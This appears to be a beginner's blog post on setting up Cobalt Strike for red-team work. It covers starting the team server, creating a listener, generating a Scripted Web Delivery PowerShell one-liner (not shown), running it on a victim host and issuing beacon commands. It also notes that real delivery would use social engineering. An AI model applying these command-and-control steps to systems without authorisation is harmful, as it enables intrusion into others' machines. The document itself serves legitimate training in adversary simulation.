As an aspiring Red Teamer, I’ve recently started playing with Cobalt Strike, so I thought it would be a good idea to start a series of blog posts on using it and its many features. As some of you may be aware, Cobalt Strike is software for Adversary Simulations and Red Team Operations.
More information can be found here: https://www.cobaltstrike.com
In this first post, I will quickly go through how to get Cobalt Strike up and running on your system, creating a listener and interacting with a victim’s machine. This will be short and to the point. 🙂
If you haven’t used Cobalt Strike before, Im going to presume that you havent go a full licenced copy. A trial copy can be requested at the following URL:
Installation and setup can be found here:
Once you have your trial copy downloaded and pre-requisites installed you can begin.
Starting the team server
From within the Cobalt Strike directory, type the following command to start the team server. 192.168.0.12 is the IP address of my Kali Linux system. Note: The password can be anything you desire.
./teamserver <IP Address> <password>
Starting Cobalt Strike
Type the following command to start the Cobalt Strike user interface
Connecting to the team server
Once you have started Cobalt Strike, you are required to connect to your team server. Fill in the details including the password you set when starting the team server. The User field can be anything you want. Use your super cool hacker handle here. ;P
Cobalt Strike’s user interface
Once connected, you will be presented with the Cobalt Strike user interface where you will interact with your agents and do all sorts of other cool stuff.
Creating a listener
You will be required to create a listener for your compromised machines to connect to. Simply click Cobalt Strike – Listeners.
Once the Listeners tab has loaded, click Add.
Give the listener a name, in this case, I called it “C2”. Select your desired payload, ensure the IP address is correct (team server IP) and choose a port to listen on.
Here you can input a domain name that points to your team server. We will use an IP address in this case.
The listener has been created and can be viewed, deleted etc from the Listeners tab.
Delivering the payload
We are now going to quickly compromise a host and have it connect to our team server in order to interact with it.
Select Attacks – Web Drive-by – Scripted Web Delivery
This will provide us with a PowerShell one-liner to run on the victim host.
Here we select the options to configure our quick web server to host and deliver the PowerShell one-liner.
Copy the URL provided.
Switch over to the victim’s machine and paste in the PowerShell one-liner. Just to be clear, this is for demonstration purposes. In reality, the payload would be delivered to the victim via some sort of social engineering attack.
Interacting with the victim host
Once the PowerShell one-liner is executed, the victim will connect to the team server and be available for interaction.
To interact with the host, right click on the compromised host and click Interact.
For demonstration, I typed the following command:
beacon> shell ipconfig /all
Hopefully this gave you some insight on how easy it is to get started with Cobalt Strike. There will be many more blog posts surrounding this excellent product.
If you’re itching to learn more, I’d recommend reading through the Cobalt Strike manual: https://www.cobaltstrike.com/downloads/csmanual39.pdf